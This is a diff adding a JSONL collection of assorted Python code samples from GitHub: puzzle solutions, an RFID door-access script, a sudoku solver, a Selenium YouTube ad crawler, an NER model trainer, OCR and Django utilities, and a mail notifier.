diff --git "a/2554.jsonl" "b/2554.jsonl" new file mode 100644--- /dev/null +++ "b/2554.jsonl" @@ -0,0 +1,2421 @@ +{"seq_id":"5611383435","text":"from aocd.models import Puzzle\n\n\ndef part1(data):\n priority_sum = 0\n for d in data:\n whoops = \"\".join(\n set(d[0 : len(d) // 2 :]).intersection(set(d[len(d) // 2 : :]))\n )\n priority_sum += ord(whoops) - 96 if whoops.islower() else ord(whoops) - 64 + 26\n\n return priority_sum\n\n\ndef part2(data):\n priority_sum = 0\n for e1, e2, e3 in zip(data[0::3], data[1::3], data[2::3]):\n badge = \"\".join(set(e1).intersection(e2).intersection(e3))\n priority_sum += ord(badge) - 96 if badge.islower() else ord(badge) - 64 + 26\n\n return priority_sum\n\n\nif __name__ == \"__main__\":\n puzzle = Puzzle(2022, 3)\n\n # convert string input to lists of ints\n data = puzzle.input_data.split(\"\\n\")\n\n # run part 1\n answer1 = part1(data)\n\n # run part 2\n answer2 = part2(data)\n\n print(f\"Part 1: {answer1}\")\n print(f\"Part 2: {answer2}\")\n","repo_name":"anissa111/advent-of-code","sub_path":"2022/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"38503191651","text":"from machine import Pin\nfrom mfrc522 import MFRC522\nimport time\n \nlector = MFRC522(spi_id=0,sck=2,miso=4,mosi=3,cs=1,rst=0)\n\nrojo = Pin(13, Pin.OUT)\nverde = Pin(12, Pin.OUT)\n\nTARJETA = 2766409360\nLLAVERO = 3643110918\n\nprint(\"Lector activo...\\n\")\n\nwhile True:\n lector.init()\n (stat, tag_type) = lector.request(lector.REQIDL)\n if stat == lector.OK:\n (stat, uid) = lector.SelectTagSN()\n if stat == lector.OK:\n identificador = int.from_bytes(bytes(uid),\"little\",False)\n \n if identificador == TARJETA:\n print(\"UID: \"+ str(identificador)+\" Acceso concedido\")\n rojo.value(0)\n verde.value(1)\n time.sleep(2)\n verde.value(0)\n \n #elif identificador == LLAVERO:\n # print(\"UID: \"+ str(identificador)+\" Acceso concedido\")\n # rojo.value(0)\n # verde.value(1)\n # time.sleep(2)\n # verde.value(0)\n \n else:\n print(\"UID: \"+ str(identificador)+\" desconocido: Acceso denegado\")\n rojo.value(1)\n verde.value(0)\n time.sleep(2)\n rojo.value(0)\n","repo_name":"ComputadorasySensores/Capitulo70","sub_path":"control_acceso.py","file_name":"control_acceso.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13524142267","text":"\"\"\"Sudoku solver\"\"\"\nimport numpy as np\n\nclass SudokuSolver():\n\n def __init__(self):\n pass\n\n def __call__(self, grid: list) -> list:\n \"\"\"Solve the given sudoku grid using backtracking (brute force).\n\n See: https://en.wikipedia.org/wiki/Sudoku_solving_algorithms\n\n Parameters\n ----------\n grid : list\n Sudoku grid with blanks\n\n Returns\n -------\n grid : list\n Solved sudoku grid\n \"\"\"\n\n grid = np.array(grid)\n print(f\"\\nStart Solving:\\n {grid}\\n\")\n\n open_positions = np.where(grid == 0)\n\n candidate_pointer = 0\n while candidate_pointer < len(open_positions[0]):\n\n position = get_position(candidate_pointer, open_positions)\n candidate = find_candidate(grid, position)\n\n if isinstance(candidate, int):\n grid[position] = candidate\n candidate_pointer += 1\n else:\n\n update_pointer = candidate_pointer - 1\n\n while update_pointer >= 0:\n\n position = get_position(update_pointer, open_positions)\n update = find_increment(grid, position)\n\n if isinstance(update, int):\n grid[position] = 
update\n candidate_pointer = update_pointer + 1\n break\n\n grid[position] = 0\n update_pointer -= 1\n\n if update_pointer == -1:\n raise\n\n print(f\"Valid Solution:\\n {grid}\")\n return grid\n\n\ndef get_position(pointer: int, open_positions: list) -> tuple:\n \"\"\"Return the current position indizes (row,col)\n\n Parameters\n ----------\n pointer : int\n Points to the current open position\n open_positions : list\n List of all open positions that need to be filled with a\n number between 1 and 9\n\n Returns\n -------\n tuple\n The current position (row,col)\n \"\"\"\n return open_positions[0][pointer], open_positions[1][pointer]\n\n\ndef find_candidate(grid: list, position: tuple) -> int:\n \"\"\"Retrieve a possible candidate for the given position\n\n Parameters\n ----------\n grid : list\n Sudoku Grid\n position : tuple\n Current position on grid (row,col)\n\n Returns\n -------\n int\n A possible candidate\n \"\"\"\n for candidate in np.arange(1, 10, 1):\n if valid_candidate(candidate, grid, position):\n return int(candidate)\n return None\n\n\ndef find_increment(grid: list, position: tuple) -> int:\n \"\"\"Retrieve the first possible increment for the given position\n\n Parameters\n ----------\n grid : list\n Sudoku Grid\n position : tuple\n Current position on grid (row,col)\n\n Returns\n -------\n int\n A possible increment\n \"\"\"\n for update in np.arange(grid[position]+1, 10, 1):\n if valid_candidate(update, grid, position):\n return int(update)\n\n return None\n\n\ndef valid_candidate(candidate: int, grid: list, position: tuple):\n \"\"\"Check that the candidate does not violate the frequency condition\n in the corresponding row, column and box.\n\n Parameters\n ----------\n candidate : int\n Description\n grid : list\n Sudoku Grid\n position : tuple\n Current position on grid (row,col)\n\n Returns\n -------\n boolean\n Indicator whether candidate violates the frequency condition or\n not.\n \"\"\"\n\n row = grid[position[0], :]\n col = grid[:, position[1]]\n box = get_box(grid, position).flatten()\n \n present_values = set(np.concatenate((row,col,box),axis=0))\n \n return not (candidate in present_values)\n\n\ndef get_box(grid: list, position: tuple):\n \"\"\"Retrive the grid to the corresponding position.\n The common grid is 9x9 and there are 3 boxes vertically and horizontally\n\n grid = (\n Box1 Box2 Box3\n Box4 Box5 Box6\n Box7 Box8 Box9\n )\n\n Parameters\n ----------\n grid : list\n Sudoku Grid\n position : tuple\n Current position on grid (row,col)\n\n Returns\n -------\n list\n The corresponding box of the current position on the grid\n\n \"\"\"\n\n box_h = position[0] // 3\n box_v = position[1] // 3\n\n ridx_from = 3 * box_h\n ridx_to = 3 * box_h + 3\n cidx_from = 3 * box_v\n cidx_to = 3 * box_v + 3\n\n return grid[ridx_from:ridx_to, cidx_from:cidx_to]\n","repo_name":"SchernHe/sudoku","sub_path":"sudoku/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36560731980","text":"import time\nimport re\nfrom utils import *\nfrom video_controls import *\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import *\nfrom selenium.webdriver import ActionChains\n\nclass IframeExitException(Exception):\n pass\n\n\ndef get_ad_duration(driver) -> int:\n\n try:\n time_left_element = driver.find_element(\n By.CSS_SELECTOR, \"span.ytp-ad-duration-remaining > div.ytp-ad-text\"\n )\n except 
NoSuchElementException:\n return -1\n\n time_units = time_left_element.text.split(\":\")\n time_units.reverse()\n time_left = 0\n\n for index, value in enumerate(time_units):\n time_left = time_left + int(value)*60**index\n\n return time_left\n\ndef get_number_of_ads_left(driver) -> int:\n\n try:\n ad_text = driver.find_element(By.CSS_SELECTOR, \".ytp-ad-simple-ad-badge > .ytp-ad-text\").get_attribute(\"innerHTML\")\n except NoSuchElementException:\n return 0\n \n \n total_pattern = r\"(?:(?<=Ad \\d of )|(?<=Sponsored \\d of ))\\d\"\n current_pattern = r\"(?:(?<=Ad )|(?<=Sponsored ))\\d\"\n\n total_match = re.search(total_pattern, ad_text)\n current_match = re.search(current_pattern, ad_text)\n\n if total_match and current_match:\n return int(total_match[0]) - int(current_match[0])\n \n return 0\n\n\ndef get_ad_order(driver) -> int:\n\n try:\n ad_text = driver.find_element(By.CSS_SELECTOR, \".ytp-ad-simple-ad-badge > .ytp-ad-text\").get_attribute(\"innerHTML\")\n except NoSuchElementException:\n return 0\n\n pattern = r\"(?:(?<=Ad )|(?<=Sponsored ))\\d\"\n match = re.search(pattern, ad_text)\n if match:\n return int(match[0])\n \n if \"Ad\" or \"Sponsored\" in ad_text:\n return 1\n \n return 0\n\ndef get_reasons(driver) -> list:\n try:\n WebDriverWait(driver, 3).until(EC.presence_of_element_located(\n (By.CLASS_NAME, \"QVfAMd-wPzPJb-xPjCTc-ibnC6b\")\n ))\n google_info = driver.find_elements(By.CLASS_NAME, \"QVfAMd-wPzPJb-xPjCTc-ibnC6b\")\n google_info = [element.get_attribute('textContent') for element in google_info]\n except:\n google_info = []\n try:\n WebDriverWait(driver, 3).until(EC.presence_of_element_located(\n (By.CLASS_NAME, \"zpMl8e-C2o4Ve-wPzPJb-xPjCTc-ibnC6b\")\n ))\n other_info = driver.find_elements(By.CLASS_NAME, \"zpMl8e-C2o4Ve-wPzPJb-xPjCTc-ibnC6b\")\n other_info = [element.get_attribute('innerHTML') for element in other_info] \n except:\n other_info = []\n \n if not google_info + other_info:\n current_stamp = get_test_id()\n username = get_username(driver)\n try:\n driver.save_screenshot(f\"error_screenshots_{username}/no_targeting_reasons_{current_stamp}.png\")\n except:\n pass\n\n return google_info + other_info\n\n\ndef get_iframe_routine(driver, username, video_id, type_of_ad, wait_time) -> tuple:\n # type_of_ad = \"side\", \"preroll\", \"preroll_companion\", \"promoted_video\"\n\n reasons, advertiser_info = None, None\n\n try:\n WebDriverWait(driver, wait_time).until(EC.presence_of_element_located(\n (By.ID, \"iframe\")\n ))\n iframe = driver.find_element(By.ID, \"iframe\")\n \n except:\n\n current_stamp = get_test_id()\n\n print(f\"{username}: detected {type_of_ad} ad but no iframe, video_id: {video_id}\")\n driver.save_screenshot(f\"error_screenshots_{username}/{type_of_ad}_no_iframe_{video_id}_{current_stamp}.png\")\n\n switch_back(driver)\n\n if type_of_ad == \"preroll\":\n return get_preroll_ad_companion_info(driver)\n\n return None, None\n\n try:\n driver.switch_to.frame(iframe)\n WebDriverWait(driver, wait_time).until(EC.presence_of_element_located(\n (By.XPATH, '//div[text()=\"My Ad Center\"]')\n ))\n\n reasons = get_reasons(driver)\n advertiser_info = get_advertiser_info(driver)\n\n except:\n try:\n # try re-clicking the iframe one more time\n switch_back(driver)\n iframe = driver.find_element(By.ID, \"iframe\")\n driver.switch_to.frame(iframe)\n\n reasons = get_reasons(driver)\n advertiser_info = get_advertiser_info(driver)\n return reasons, advertiser_info\n except:\n pass\n\n current_stamp = get_test_id()\n \n print(f\"{username}: {type_of_ad} ad iframe 
timed out, video_id: {video_id}\")\n driver.save_screenshot(f\"error_screenshots_{username}/{type_of_ad}_timedout_{video_id}_{current_stamp}.png\")\n switch_back(driver)\n return reasons, advertiser_info\n\n try:\n exit_info_iframe(driver)\n except:\n current_stamp = get_test_id()\n \n print(f\"{username}: can't exit from {type_of_ad} ad popup, video_id: {video_id}\")\n driver.save_screenshot(f\"error_screenshots_{username}/{type_of_ad}_timedout_{current_stamp}.png\")\n\n raise IframeExitException()\n\n return reasons, advertiser_info\n\n\ndef exit_info_iframe(driver):\n\n try:\n exit_button = driver.find_element(\n By.CSS_SELECTOR, \".VfPpkd-Bz112c-LgbsSe.yHy1rc.eT1oJ.mN1ivc.zBmRhe-LgbsSe\" \n )\n driver.execute_script(\"arguments[0].click();\", exit_button)\n except:\n pass\n \n switch_back(driver)\n\n\ndef get_advertiser_info(driver) -> tuple:\n\n advertiser_name, advertiser_loc = None, None\n\n try:\n ad_container = driver.find_elements(By.CLASS_NAME, \"G5HdJb-fmcmS\")\n if ad_container:\n advertiser_name = ad_container[0].get_attribute(\"innerHTML\")\n advertiser_loc = ad_container[1].get_attribute(\"innerHTML\")\n except IndexError:\n return advertiser_name, None\n except NoSuchElementException:\n pass\n\n return advertiser_name, advertiser_loc\n\n\ndef get_preroll_ad_companion_info(driver) -> tuple:\n\n username = get_username(driver)\n video_id = get_video_id(driver.current_url)\n\n try:\n info_button = driver.find_element(By.CSS_SELECTOR, \"#action-companion-ad-info-button\").find_element(By.CSS_SELECTOR, \"button\")\n driver.execute_script(\"arguments[0].click();\", info_button)\n\n except NoSuchElementException:\n \n print(f\"{username}: preroll ad companion info button is not found\")\n driver.save_screenshot(f\"error_screenshots_{username}/no_preroll_ad_companion_info_button_{video_id}.png\") \n\n return None, None\n \n return get_iframe_routine(driver, username, video_id, \"preroll_companion\", 2)\n\ndef get_preroll_ad_info(driver) -> tuple:\n\n username = get_username(driver)\n video_id = get_video_id(driver.current_url)\n reasons, advertiser_info = None, None\n\n try:\n WebDriverWait(driver, 2).until(EC.presence_of_element_located(\n (By.CSS_SELECTOR,\n \"button.ytp-ad-button.ytp-ad-button-link.ytp-ad-clickable\")\n ))\n info_button = driver.find_element(\n By.CSS_SELECTOR,\n \"button.ytp-ad-button.ytp-ad-button-link.ytp-ad-clickable\"\n )\n time.sleep(1)\n driver.execute_script(\"arguments[0].click();\", info_button)\n \n except:\n \n msg = f\"{username}: preroll ad info button is not found\"\n print(msg)\n video_id = get_video_id(driver.current_url)\n driver.save_screenshot(f\"error_screenshots_{username}/no_preroll_ad_info_button_{video_id}.png\") \n return get_preroll_ad_companion_info(driver)\n\n\n try:\n reason_container = driver.find_element(By.CSS_SELECTOR, \".ytp-ad-info-dialog-ad-reasons\")\n li = reason_container.find_elements(By.CSS_SELECTOR,\"li\")\n reasons = [element.get_attribute('innerHTML') for element in li] \n return reasons, get_advertiser_info(driver)\n except NoSuchElementException:\n pass\n\n return get_iframe_routine(driver, username, video_id, \"preroll\", 2)\n\n\ndef get_preroll_ad_id(driver) -> str | None:\n\n try:\n # right clicking the video and opening the \"stats for nerds\" menu\n action = ActionChains(driver)\n video_player = driver.find_element(\n By.CSS_SELECTOR, \"#movie_player > div.html5-video-container > video\"\n )\n action.context_click(video_player).perform()\n stats_button = driver.find_element(\n By.CSS_SELECTOR,\n 
\"div.ytp-popup.ytp-contextmenu > div > div > div:nth-child(7)\",\n )\n driver.execute_script(\"arguments[0].click();\", stats_button)\n id_element = driver.find_element(By.CSS_SELECTOR, \".ytp-sfn-cpn\")\n\n # use split to extract only the video id characters\n ad_id = id_element.text.split()[0]\n\n exit_button = driver.find_element(\n By.CSS_SELECTOR, \"button.html5-video-info-panel-close.ytp-button\"\n )\n driver.execute_script(\"arguments[0].click();\", exit_button)\n return ad_id\n\n except NoSuchElementException:\n return None\n except ElementNotInteractableException:\n return None\n except IndexError:\n print(f\"index error, returning id_element.text = {id_element.text}\")\n return id_element.text\n\n \ndef get_preroll_ad_companion_site(driver) -> tuple:\n\n try:\n site = driver.find_element(By.CSS_SELECTOR, \"span#domain\").get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n return None, None\n \n try:\n header = driver.find_element(By.CSS_SELECTOR,\".style-scope.ytd-action-companion-ad-renderer#header\").get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n return site, None\n \n return site, header\n\ndef get_preroll_ad_site(driver) -> tuple:\n\n site, card_headline, card_descr = \"\", \"\", \"\"\n\n # site is usually the link to advertiser's site, but sometimes it's just the site name\n try:\n site = driver.find_element(\n By.CSS_SELECTOR,\n \"button.ytp-ad-button.ytp-ad-visit-advertiser-button.ytp-ad-button-link\"\n ).get_attribute(\"aria-label\").strip()\n\n except NoSuchElementException:\n pass\n \n try:\n card_headline = driver.find_element(By.CSS_SELECTOR, \".ytp-ad-text.ytp-flyout-cta-headline\").get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n pass\n\n try:\n card_descr = driver.find_element(By.CSS_SELECTOR, \".ytp-ad-text.ytp-flyout-cta-description\").get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n pass\n\n card = card_headline + \" \" + card_descr\n card = card if card.strip() else None\n\n if not site:\n return get_preroll_ad_companion_site(driver)\n\n return site, card\n \n\n\n\ndef get_side_ad_info(driver) -> tuple:\n\n username = get_username(driver)\n video_id = get_video_id(driver.current_url)\n\n try:\n menu_button = driver.find_element(\n By.CSS_SELECTOR,\n \".style-scope.ytd-promoted-sparkles-web-renderer > yt-icon-button > button\",\n )\n time.sleep(1)\n driver.execute_script(\"arguments[0].click();\", menu_button)\n\n except NoSuchElementException:\n return None, None\n\n \n # potentially deprecated drop-down menu that has My Ad Center as an option\n try:\n\n info_button = driver.find_element(\n By.CSS_SELECTOR,\n \"#items > ytd-menu-navigation-item-renderer.style-scope.ytd-menu-popup-renderer.iron-selected > a > tp-yt-paper-item\",\n )\n\n driver.execute_script(\"arguments[0].click();\", info_button)\n except NoSuchElementException:\n pass\n except:\n print(f\"{username}: can't click side info button\")\n print(traceback.format_exc())\n pass\n \n return get_iframe_routine(driver, username, video_id, \"side\", 5)\n\n\ndef get_side_ad_site(driver):\n\n # site is usually the link to advertiser's site, but sometimes it's just the site name\n\n try:\n side_ad_container = driver.find_element(By.CSS_SELECTOR, \"#website-text\")\n site = side_ad_container.get_attribute(\"innerHTML\").strip()\n return site\n except NoSuchElementException:\n return None\n\n\n\ndef click_side_ad(driver):\n\n try:\n\n element = driver.find_element(\n By.CSS_SELECTOR,\n 
\".style-scope.ytd-promoted-sparkles-web-renderer > yt-button-shape > button\"\n )\n\n driver.execute_script(\"arguments[0].click();\", element)\n except NoSuchElementException:\n return None\n\n # save current tab and switch chromedriver's focus to the new tab\n video_tab = driver.current_window_handle\n tabs_open = driver.window_handles\n driver.switch_to.window(tabs_open[1])\n \n url = driver.current_url\n while url == \"about:blank\":\n url = driver.current_url\n driver.execute_script(\"window.stop();\")\n url = driver.current_url\n driver.close()\n driver.switch_to.window(video_tab)\n return url\n\ndef click_preroll_ad(driver):\n\n try:\n element = driver.find_element(\n By.CSS_SELECTOR,\n \"button.ytp-ad-button.ytp-ad-visit-advertiser-button.ytp-ad-button-link\"\n )\n\n driver.execute_script(\"arguments[0].click();\", element)\n except NoSuchElementException:\n return None\n\n # save current tab and switch chromedriver's focus to the new tab\n video_tab = driver.current_window_handle\n tabs_open = driver.window_handles\n driver.switch_to.window(tabs_open[1])\n \n url = driver.current_url\n while url == \"about:blank\":\n url = driver.current_url\n driver.execute_script(\"window.stop();\")\n url = driver.current_url\n driver.close()\n driver.switch_to.window(video_tab)\n return url\n\ndef get_side_ad_text(driver):\n\n title, body = \"\", \"\"\n\n try:\n title_container = driver.find_element(By.CSS_SELECTOR, \"#title.style-scope.ytd-promoted-sparkles-web-renderer.yt-simple-endpoint\")\n title = title_container.get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n pass\n\n try:\n body_container = driver.find_element(By.CSS_SELECTOR, \"#description.style-scope.ytd-promoted-sparkles-web-renderer.yt-simple-endpoint\")\n body = body_container.get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n pass\n\n text = title + body\n text = text if text else None\n return text\n\n\ndef get_side_ad_img(driver):\n\n try:\n img_container = driver.find_element(By.CSS_SELECTOR, \"#thumbnail.style-scope.ytd-promoted-sparkles-web-renderer > img\")\n img_src = img_container.get_attribute(\"src\")\n except NoSuchElementException:\n return None\n\n return img_src\n\n\ndef get_promoted_video_title(driver):\n\n\n try:\n container = driver.find_element(By.CSS_SELECTOR, \"#video-title.style-scope.ytd-compact-promoted-video-renderer\")\n title = container.get_attribute(\"title\")\n except NoSuchElementException:\n return None\n\n return title\n\n\ndef get_promoted_video_channel(driver) -> str:\n\n try:\n ad_container = driver.find_element(By.CSS_SELECTOR, \"#endpoint-link.yt-simple-endpoint.style-scope.ytd-compact-promoted-video-renderer\")\n channel_container = ad_container.find_element(By.CSS_SELECTOR, \"#text > a\")\n channel = channel_container.get_attribute(\"innerHTML\")\n return channel\n except NoSuchElementException:\n return None\n\n\n\ndef get_promoted_video_info(driver) -> tuple:\n\n username = get_username(driver)\n video_id = get_video_id(driver.current_url)\n\n try:\n menu_button = driver.find_element(\n By.CSS_SELECTOR,\n \".style-scope.ytd-compact-promoted-video-renderer > yt-icon-button > button\")\n time.sleep(1)\n driver.execute_script(\"arguments[0].click();\", menu_button)\n except NoSuchElementException:\n return None, None\n \n try:\n WebDriverWait(driver, 1).until(EC.presence_of_element_located(\n (By.CSS_SELECTOR,\n \"#items > ytd-menu-navigation-item-renderer > a > tp-yt-paper-item\",\n )\n ))\n info_button = driver.find_element(\n By.CSS_SELECTOR,\n 
\"#items > ytd-menu-navigation-item-renderer > a > tp-yt-paper-item\"\n )\n time.sleep(1)\n driver.execute_script(\"arguments[0].click();\", info_button)\n except:\n pass\n\n return get_iframe_routine(driver, username, video_id, \"promoted_video\", 2)\n\n\ndef get_promoted_video_url(driver) -> str | None:\n\n try:\n element = driver.find_element(\n By.CSS_SELECTOR,\n \"#rendering-content > ytd-compact-promoted-video-renderer > div > a\",\n )\n\n raw_url = element.get_attribute(\"href\")\n pattern = r\"(?<=video_id=).{11}\"\n match = re.search(pattern, raw_url)\n\n if match:\n return \"https://www.youtube.com/watch?v=\" + match[0]\n\n except NoSuchElementException:\n return None\n\n\n\n","repo_name":"catxmai/youtube-ad-crawler-public","sub_path":"get_ad_info.py","file_name":"get_ad_info.py","file_ext":"py","file_size_in_byte":16807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32752337587","text":"\"\"\"\nThis module contains algorithms to train and test BERT and Linear Layer + CRF models.\nAuthor: Lucas Pavanelli\n\"\"\"\nimport torch\nimport torch.nn as nn\n\n\nclass Trainer:\n \"\"\"\n Trains and tests BERT and Linear Layer + CRF models.\n\n Parameters\n ----------\n model : torch.nn.Module\n PyTorch model\n batch : int\n Batch size.\n is_bert : bool\n If model is a BERT model or not.\n criterion : torch.nn\n PyTorch criterion\n device : torch.device\n PyTorch device\n\n Attributes\n ----------\n model : torch.nn.Module\n PyTorch model\n batch : int\n Batch size.\n is_bert : bool\n If model is a BERT model or not.\n criterion : torch.nn\n PyTorch criterion\n device : torch.device\n PyTorch device\n \"\"\"\n def __init__(self, model, batch, is_bert=False, criterion=nn.CrossEntropyLoss(), device=\"cpu\"):\n self.model = model\n self.is_bert = is_bert\n self.batch = batch\n self.criterion = criterion\n self.device = device\n\n def _train_linear_layer_crf(self, train_data, optimizer, epoch):\n self.model.train()\n loss, losses = 0, 0\n for i, (token_ids, tag_ids, _) in enumerate(train_data):\n # Init\n optimizer.zero_grad()\n # Calculate loss\n l = self.model.loss(token_ids, tag_ids)\n loss += l\n losses += l\n if (i + 1) % self.batch == 0:\n # Backpropagation\n loss = loss / self.batch\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n # Display\n print('Train Epoch: {} \\tLoss: {:.6f}'.format(epoch, losses / i), end='\\r')\n loss = 0\n print()\n\n def _train_bert(self, train_data, optimizer, epoch):\n loss, losses = 0, 0\n for i, (token_ids, subwords_idx, tag_ids) in enumerate(train_data):\n # Init\n optimizer.zero_grad()\n # Predict\n output = self.model(token_ids, subwords_idx)\n # Calculate loss\n l = self.criterion(output, tag_ids.to(self.device))\n loss += l\n losses += l\n if (i + 1) % self.batch == 0:\n # Backpropagation\n loss = loss / self.batch\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n # Display\n print('Train Epoch: {} \\tLoss: {:.6f}'.format(epoch, losses / i), end='\\r')\n loss = 0\n print()\n\n def train(self, train_data, optimizer, epoch):\n \"\"\"\n Trains model using train data.\n\n Parameters\n ----------\n train_data : list\n List of tuples representing train data.\n optimizer : optim.SGD\n PyTorch optimizer.\n epoch : int\n Number of epoch\n \"\"\"\n self.model.train()\n if self.is_bert:\n self._train_bert(train_data, optimizer, epoch)\n else:\n self._train_linear_layer_crf(train_data, optimizer, epoch)\n\n def _test_linear_layer_crf(self, test_data):\n y_pred, y_true = [], 
[]\n for i, (token_ids, tag_ids, _) in enumerate(test_data):\n output = self.model(token_ids)\n y_pred.append([int(w) for w in list(output[0])])\n y_true.append([int(w) for w in list(tag_ids[0])])\n return y_true, y_pred\n\n def _test_bert(self, test_data):\n y_pred, y_true = [], []\n for i, (token_ids, subwords_idx, tag_ids) in enumerate(test_data):\n output = self.model(token_ids, subwords_idx)\n y_pred.append([int(w) for w in list(torch.argmax(output, dim=1))])\n y_true.append([int(w) for w in list(tag_ids)])\n return y_true, y_pred\n\n def test(self, test_data):\n \"\"\"\n Tests model using test data.\n\n Parameters\n ----------\n test_data : list\n List of tuples representing test data.\n\n Returns\n -------\n list\n True and predicted values\n \"\"\"\n self.model.eval()\n if self.is_bert:\n return self._test_bert(test_data)\n else:\n return self._test_linear_layer_crf(test_data)\n","repo_name":"pavalucas/Bete","sub_path":"src/ner/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38858866057","text":"import io\n\nfrom google.cloud import vision\n\nfrom extract import extract\n\nclient = vision.ImageAnnotatorClient()\n\nfile = open(\"final.csv\", \"w\")\n\nfile.write(\"Box-ID,Voter ID,Name,Parent Name,House No.,Age,Gender\\n\")\n\nfor row_idx in range(10):\n for col_idx in range(3):\n with io.open(\"output/5/\" + str(col_idx) + \"_\" + str(row_idx) + \".png\", 'rb') as image_file:\n content = image_file.read()\n\n image = vision.Image(content=content)\n\n response = client.text_detection(image=image)\n if response.error.message:\n raise Exception(\n '{}\\nFor more info on error messages, check: '\n 'https://cloud.google.com/apis/design/errors'.format(\n response.error.message))\n texts = response.text_annotations\n\n print(texts[0].description)\n file.write(extract(texts[0].description))\n","repo_name":"Oxvsys/pdf-to-excel","sub_path":"test-gcp-vision.py","file_name":"test-gcp-vision.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26378742865","text":"from django.shortcuts import render, redirect\nfrom .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm\n# from django.contrib.auth import login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\ndef registro(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save() \n username = form.cleaned_data.get('username')\n messages.success(request, f'Cuenta creada para {username}. 
Ya puede iniciar sesion')\n return redirect ('users:login')\n else:\n form = UserRegisterForm()\n\n return render(request, 'users/register.html', {'formulario':form})\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n user_form = UserUpdateForm(request.POST, instance=request.user)\n prof_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n \n if user_form.is_valid() and prof_form.is_valid():\n user_form.save()\n prof_form.save()\n messages.success(request, f'Su cuenta ha sido actualizada')\n return redirect('users:perfil')\n \n else:\n user_form = UserUpdateForm(instance=request.user)\n prof_form = ProfileUpdateForm(instance=request.user.profile)\n \n context = {'form_usuario':user_form, 'form_perfil':prof_form }\n \n return render(request, 'users/profile.html', context)","repo_name":"xpsylon/TerapiaOnline","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43634258969","text":"#!/usr/bin/env python\n\nimport sys, smtplib\n\nif len(sys.argv) != 2 or not len(sys.argv[1]):\n\tsys.exit(1)\n\narticle = sys.argv[1]\nshortArticle = article\nif len(shortArticle) > 64:\n\tshortArticle = shortArticle[:64] + '...'\naddress = 'perot.me-comment-' + shortArticle + '@perot.me'\n\n# Could use SMTP_SSL but this is all local traffic\nserver = smtplib.SMTP('localhost')\nserver.sendmail(\n\taddress,\n\taddress,\n\t'\\r\\n'.join((\n\t\t'From: ' + address,\n\t\t'To: ' + address,\n\t\t'Subject: [perot.me] ' + article + ': New comment notification',\n\t\t'',\n\t\t'There are new comments waiting on article ' + article + ':',\n\t\t'',\n\t\t'https://perot.me/' + article\n\t))\n)\nserver.quit()\n","repo_name":"EtiennePerot/perot.me","sub_path":"src/blog/comments/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"73834884213","text":"import heapq\n\nclass Solution:\n def kSmallestPairs(self, nums1, nums2, k: int):\n heap, res = [], []\n if len(nums1) == 0 or len(nums2) == 0:\n return []\n\n for i in range(len(nums1)):\n for j in range(len(nums2)):\n heapq.heappush(heap, (nums1[i] + nums2[j], (nums1[i], nums2[j])))\n if k > len(nums1) * len(nums2):\n size = len(nums1) * len(nums2)\n else:\n size = k\n for _ in range(size):\n val = heapq.heappop(heap)\n res.append(val[1])\n return res\n","repo_name":"kalmad99/CompetitiveProgramming","sub_path":"Daily Questions/findKPairswithSmallestSums.py","file_name":"findKPairswithSmallestSums.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1660728386","text":"import sys\ninput = sys.stdin.readline\ndef sol():\n N = int(input())\n balls = list(input().rstrip())\n # 공 개수\n rcnt = balls.count('R')\n bcnt = balls.count('B')\n # 한 공만 있다면 0\n if not rcnt or not bcnt:\n return 0\n # 양극단에서 연속적인 공의 개수 찾기\n l = balls[0]\n lcon = 1\n r = balls[-1]\n rcon = 1\n for i in range(1, N):\n if l != balls[i]:\n break\n lcon += 1\n for i in range(N - 2, -1, -1):\n if r != balls[i]:\n break\n rcon += 1\n # 경우의 수\n ans = N\n # 공을 왼쪽으로 모으는 경우\n if l == 'B':\n ans = min(ans, bcnt - lcon)\n else:\n ans = min(ans, rcnt - lcon)\n # 공을 오른쪽으로 모으는 경우\n if r == 'B':\n ans = min(ans, bcnt - rcon)\n else:\n ans = min(ans, rcnt - rcon)\n # 양극단에 위치한 공이 아니더라도 수가 적다면\n if rcnt < 
